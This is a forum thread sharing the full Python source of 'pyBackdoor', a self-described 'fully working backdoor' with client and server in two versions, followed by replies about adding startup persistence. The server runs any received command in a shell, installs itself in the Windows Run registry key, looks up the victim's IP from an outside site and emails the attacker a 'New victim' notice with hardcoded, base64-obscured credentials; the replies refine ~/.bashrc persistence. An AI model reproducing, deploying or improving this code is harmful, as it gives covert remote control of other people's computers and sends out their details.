It looks like you're new here. If you want to get involved, click one of these buttons!
#!/usr/bin/python
#Commened out == debug
'''
pyBackdoor client
@author: chroniccommand + Xinapse
@contact: chroniccommand@gmail.com
@organization: Poison + iExploit
@summary: Fully working backdoor in Python
@version: 2.0 public
'''
import sys, socket
socksize = 4096
print(\"\"\"
( ) (
( ( )\ ) ( /( )\ ) (
` ) )\ ) )((_) ( /( ( )\())(()/( ( ( )(
/(/( (()/(((_)_ )(_)) )\ ((_)\ ((_)) )\ )\ (()\
((_)_\ )(_))| _ )((_)_ ((_)| |(_) _| | ((_) ((_) ((_)
| '_ \)| || || _ \/ _` |/ _| | / // _` |/ _ \/ _ \| '_|
| .__/ \_, ||___/\__,_|\__| |_\_\\__,_|\___/\___/|_|
|_| |__/
Version: 2.0 Public
Author: Chroniccommand + Xinapse
http://iexploit.org/
http://poison.teamxpc.com
\"\"\")
def main():
if len(sys.argv) != 3:
print(\"Usage: %s <host> <port>\" % sys.argv[0])
sys.exit()
else:
print(\"Welcome to pyBackdoor main menu. Type ? for help\")
print(\"Type cmdlist for a list of commands\")
connect()
def connect():
global conn
global host
global port
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
conn.connect((host, port))
pbd()
def pbd():
cmdlist =['?', 'help', 'shell', 'pid', 'sysinfo', 'process', 'name', 'access','getuid', 'user', 'killsrv', 'exit']
print(\"Connected to host \" + sys.argv[1])
td = 1
while td == 1:
cmd = raw_input('pbd> ')
if cmd == '?':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
pid - Get the servers PID
sysinfo - Get system info
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'help':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
pid - Get the servers PID
sysinfo - Get system info
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'shell':
print(\"Dropped into shell. Type exitsh to get back to main menu. Please note this is !very! buggy\")
while True:
shell = raw_input(\"$ \")
if shell == \"exitsh\":
pbd()
else:
conn.send(shell)
data = conn.recv(socksize)
output = data
print(output)
elif cmd == \"pid\":
conn.send(\"getpid\")
elif cmd == \"sysinfo\":
conn.send(\"getsys\")
elif cmd == 'name':
conn.send('osname')
elif cmd == 'access':
conn.send('ifaccess')
elif cmd == 'getterm':
conn.send('getterm')
elif cmd == 'getuid':
conn.send('pgetuid')
elif cmd == 'user':
conn.send('seeuser')
elif cmd == 'exit':
sys.exit()
elif cmd == 'killsrv':
conn.send('killsrv')
conn.close()
sys.exit()
elif cmd == 'cmdlist':
print cmdlist
pbd()
else:
print(\"Command not recognized\")
pbd()
data = conn.recv(socksize)
output = data
print(output)
main()
#!/usr/bin/env python
#Commented out == debug
'''
pyBackdoor server
@author: chroniccommand + Xinapse
@contact: chroniccommand@gmail.com
@organization: Poison + iExploit
@summary: Fully working backdoor in Python
@version: 2.0 public
'''
#Damn... thats a lot of imports
import sys, socket, os, subprocess, time, smtplib, urllib, errno, tempfile, base64
import platform as plt
import fileinput, os.path, random, time
from email.MIMEText import MIMEText
fname = sys.argv[0] #For the current name
fpath = os.getcwd() #Current path
ostype = plt.system()
ostuple = ('Linux', 'Windows')
#Check if the server is already running. If it is, silently close.... like a ninja
class RunOnce:
def __init__(self):
import sys
self.lockfile = os.path.normpath(tempfile.gettempdir() + '/' + os.path.basename(__file__) + '.lock')
if sys.platform == 'win32':
try:
if(os.path.exists(self.lockfile)):
os.unlink(self.lockfile)
self.fd = os.open(self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
except OSError, e:
if e.errno == 13:
sys.exit()
else:
import fcntl
self.fp = open(self.lockfile, 'w')
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
sys.exit()
def __del__(self):
import sys
if sys.platform == 'win32':
if hasattr(self, 'fd'):
os.close(self.fd)
os.unlink(self.lockfile)
me = RunOnce()
#if ostype == ostuple[0]:
#Here we have two options. One we can copy the server to a dir or just run it
#Option 1(Turned off by default)
# mypath = os.path.basename(__file__)
# startupfile = os.path.expanduser('~/.bashrc')
# startupline = 'python %s &\n' % os.path.abspath(__file__)
#
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline,
# else:
# print line,
#
# if not written:
# open(startupfile,'a').write('\n'+startupline)
#Option 2 - Copy to ~/.config
# mypath = os.path.basename(__file__)
# startupfile = os.path.expanduser(\"~/.bashrc\")
# newdir = os.path.expanduser(\"~/.config\")
# add = newdir + \"/\" + mypath
# mine = os.path.abspath(__file__)
# startupline = 'python %s &\n' % os.path.abspath(add)
# isexist = os.path.exists(newdir)
# iscpexist = os.path.exists(add)
# if isexist == True:
# if iscpexist == True:
# pass
# else:
# os.system('cp ' + mine + \" \" + newdir)
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline, # rewrite
# #else remove duplicate line
# else:
# print line,
#
# if not written:
# open(startupfile, 'a').write('\n' + startupline)
# else:
# os.mkdir(newdir)
# if iscpexist == True:
# pass
# else:
# os.system('cp ' + mine + \" \" + newdir)
# written = False
# for line in fileinput.input(startupfile, inplace=1):
# if mypath in line:
# if not written:
# written = True
# print startupline,
# else:
# print line,
#
# if not written:
# open(startupfile, 'a').write('\n' + startupline)
if ostype == ostuple[1]:
from _winreg import *
startupval = r'Software\Microsoft\Windows\CurrentVersion\Run'
try:
stkey = OpenKey(HKEY_CURRENT_USER, startupval, 0, KEY_ALL_ACCESS)
except:
pass
SetValueEx(stkey, \"Ntsre\", 0, REG_SZ, fname)
CloseKey(stkey)
#Get external IP
try:
# print(\"[DEBUG]IP obtained\")
ip = urllib.urlopen(\"http://poison.teamxpc.com/myip\").read()
except:
ip = \"IP could not be determined\"
#Here we email the attacker with info of the victim.
#Change these!
user = 'Y2hyb25pY2NvbW1hbmRAZ21haWwuY29t'
user = base64.b64decode(user)
passwd = 'cGFzc3dvcmQ='
passwd = base64.b64decode(passwd)
message = \"Somebody has opened your pyBackdoor server. \nNew victim at IP: \" + ip
subject = \"pyBackdoor - New victim!\"
from_addr = user
to_addr = user
msg = MIMEText(message)
msg['Subject'] = subject
msg['From'] = from_addr
msg['To'] = to_addr
try:
server = smtplib.SMTP('smtp.gmail.com', 587) #port 465 or 587
server.ehlo()
server.starttls()
server.ehlo()
server.login(user, passwd)
server.sendmail(from_addr, to_addr, msg.as_string())
server.close()
print(\"[DEBUG]Sent E-Mail\")
except:
pass
socket.setdefaulttimeout(150)
host = ''
port = 50005
socksize = 4096
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
#print(\"[DEBUG]Server started on port: %s\" % port)
s.listen(1)
#print(\"[DEBUG]Now listening...\n\")
conn, addr = s.accept()
while True:
# print '[DEBUG]New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
if not data:
break
elif data == 'killsrv':
conn.close()
sys.exit()
elif data == 'osname':
d = os.name
conn.send(d)
elif data == 'ifaccess':
ac = os.access('/', 1)
if ac == True:
iftrue = \"True\"
else:
iftrue = \"False\"
conn.send(iftrue)
elif data == 'getterm':
ge = os.ctermid()
conn.send(ge)
elif data == 'pgetuid':
uid = os.getuid()
uid = str(uid)
conn.send(uid)
elif data == 'seeuser':
us = os.getlogin()
conn.send(us)
elif data == \"getpid\":
pid = os.getpid()
pid = str(pid)
conn.send(\"Current PID: \" + pid)
elif data == \"getsys\":
unum = os.getuid()
pnum = os.getpid()
curdir = os.getcwd()
sysname = os.uname()
sysname = str(sysname)
curtime = time.time()
curtime = time.ctime(curtime)
conn.send(\"UID: %d\n\" % unum)
conn.send(\"PID: %d\n\" % pnum)
conn.send(\"Current dir: \" + curdir + \"\n\")
conn.send(\"System info: \" + sysname + \"\n\")
conn.send(\"Current time: \" + curtime + \"\n\")
conn.send(\"----End sys info----\")
else:
p = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
l = line
conn.send(l)
#!/usr/bin/env python
#Commented out == debug
'''
pyBackdoor server
@author: chroniccommand
@contact: chroniccommand@gmail.com
@organization: Poison
@summary: Backdoor written in Python. Simple as of now, but I plan for this to grow.
@todo: Add more commands. Add to startup.
@version: 1.0 public
'''
import sys, socket, os, subprocess
#socket.setdefaulttimeout(150)
host = ''
port = 50002
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
#print(\"Server started on port: %s\" % port)
s.listen(1)
#print(\"Now listening...\n\")
conn, addr = s.accept()
while True:
# print 'New connection from %s:%d' % (addr[0], addr[1])
data = conn.recv(socksize)
if not data:
break
elif data == 'killsrv':
conn.close()
sys.exit()
elif data == 'osname':
d = os.name
conn.send(d)
elif data == 'ifaccess':
ac = os.access('/', 1)
if ac == True:
iftrue = \"True\"
else:
iftrue = \"False\"
conn.send(iftrue)
elif data == 'getterm':
ge = os.ctermid()
conn.send(ge)
elif data == 'pgetuid':
uid = os.getuid()
uid = str(uid)
conn.send(uid)
elif data == 'seeuser':
us = os.getlogin()
conn.send(us)
else:
d = os.popen(data)
conn.send(d.read())
#!/usr/bin/python
#Commened out == debug
'''
pyBackdoor client
@author: chroniccommand
@contact: chroniccommand@gmail.com
@organization: Poison
@summary: Backdoor written in Python. Simple as of now, but I plan for this to grow.
@todo: Add more commands. Add to startup.
@version: 1.0 public
'''
import sys, socket, subprocess
socksize = 1024
print(\"\"\"
( ) (
( ( )\ ) ( /( )\ ) (
` ) )\ ) )((_) ( /( ( )\())(()/( ( ( )(
/(/( (()/(((_)_ )(_)) )\ ((_)\ ((_)) )\ )\ (()\
((_)_\ )(_))| _ )((_)_ ((_)| |(_) _| | ((_) ((_) ((_)
| '_ \)| || || _ \/ _` |/ _| | / // _` |/ _ \/ _ \| '_|
| .__/ \_, ||___/\__,_|\__| |_\_\\__,_|\___/\___/|_|
|_| |__/
Version: 1.0 Public
Author: Chroniccommand + Xinapse
http://iexploit.org/
\"\"\")
def main():
if len(sys.argv) != 3:
print(\"Usage: %s <host> <port>\" % sys.argv[0])
sys.exit()
else:
print(\"Welcome to pyBackdoor main menu. Type ? for help\")
print(\"Type cmdlist for a list of commands\")
connect()
def connect():
global conn
global host
global port
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
conn.connect((host, port))
pbd()
def pbd():
cmdlist =['?', 'help', 'shell', 'name', 'access', 'getterm', 'getuid', 'user', 'killsrv', 'exit']
print(\"Connected to host \" + sys.argv[1])
td = 1
while td == 1:
cmd = raw_input('pbd> ')
if cmd == '?':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'help':
print(\"\"\"
----pyBackdoor command list----
? - Help menu
help - Help menu
cmdlist - List of commands
shell - Drop into shell(buggy)
name - OS name
access - Test access to /
getterm - Get current terminal
getuid - Get UID
user - Get username
killsrv - Close the server
exit - Exit
\"\"\")
pbd()
elif cmd == 'shell':
print(\"Dropped into shell. Please note this is !very! buggy\")
while True:
shell = raw_input(\"$ \")
conn.send(shell)
data = conn.recv(socksize)
output = data
print(output)
elif cmd == 'name':
conn.send('osname')
elif cmd == 'access':
conn.send('ifaccess')
elif cmd == 'getterm':
conn.send('getterm')
elif cmd == 'getuid':
conn.send('pgetuid')
elif cmd == 'user':
conn.send('seeuser')
elif cmd == 'exit':
sys.exit()
elif cmd == 'killsrv':
conn.send('killsrv')
conn.close()
sys.exit()
elif cmd == 'cmdlist':
print cmdlist
pbd()
else:
print(\"Command not recognized\")
data = conn.recv(socksize)
output = data
print(output)
main()
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079
Author: Chroniccommand + Xinapse
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Yeah i know i was just saying that i help do some of it at least
Wheres my credits? :P
I thought this was this http://www.iexploit.org/community/showt ... p?tid=2079Author: Chroniccommand + Xinapse
Sorry, forgot to add that on the top part. I'll add it in on the next release.
Also, that other version was not the best(no offense :P). This version is more complete and has pbd.
Yeah i know i was just saying that i help do some of it at least
Yea plus you started off the whole idea ;P
You can further help by adding to the source since its an opensource community project.
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a seperate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should pretty similiar
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a seperate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should pretty similiar
Well right now I found out what to do. I have a class that checks if the file is currently open, and if it is it closes with no messages or anything. But now I'm having another problem. It's set to add this to the ~/.bashrc:
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
So it gets the current path and the name, appends a / to the end right before the name and then tacks on & to run in the background. Only problem is it adds that every time it runs. So it adds multiple lines and adds extra slashes for some reason. I'm working on a function right now that searches the ~/.bashrc file for that and if it has it it wont add it. Hopefully that will eliminate the problem. But then I need to find out how to do it in windows. I guess I'll just use the registry.
...Not sure how you'd do it in py, probably using sys calls etc...
http://embraceubuntu.com/2005/09/07/add ... at-bootup/
Thats how i'd do it in linux
I've tried adding to ~/.bashrc but theres a couple problems
[list=1]
[*]It opens up every time a terminal is opened, causing problems such as conflicts(causing the server to crash)[/*:m]
[*]I can't figure out how to make it check to see if it's already running[/*:m][/list:o]
Check processes, if it's started then don't reopen it. Or you could close original instance then restart it. You could probably do a seperate script to do that or try embedding it within the server script. If you know bash etc you could do it fairly simply, doing it in perl with system calls would be pretty simple I would think. Should pretty similiar
Well right now I found out what to do. I have a class that checks if the file is currently open, and if it is it closes with no messages or anything. But now I'm having another problem. It's set to add this to the ~/.bashrc:
fname = sys.argv[0]
fpath = os.getcwd()
os.system('echo \"python ' + fpath + '/' + fname + ' &\" >> ~/.bashrc')
So it gets the current path and the name, appends a / to the end right before the name and then tacks on & to run in the background. Only problem is it adds that every time it runs. So it adds multiple lines and adds extra slashes for some reason. I'm working on a function right now that searches the ~/.bashrc file for that and if it has it it wont add it. Hopefully that will eliminate the problem. But then I need to find out how to do it in windows. I guess I'll just use the registry.
Registry startup would be the best. Boxes running python in windows are rare tho... I would have thought anyway. Unless you convert to binary etc.
8.2mb
8.2mb
Please tell me you put the 'm' in by mistake. :O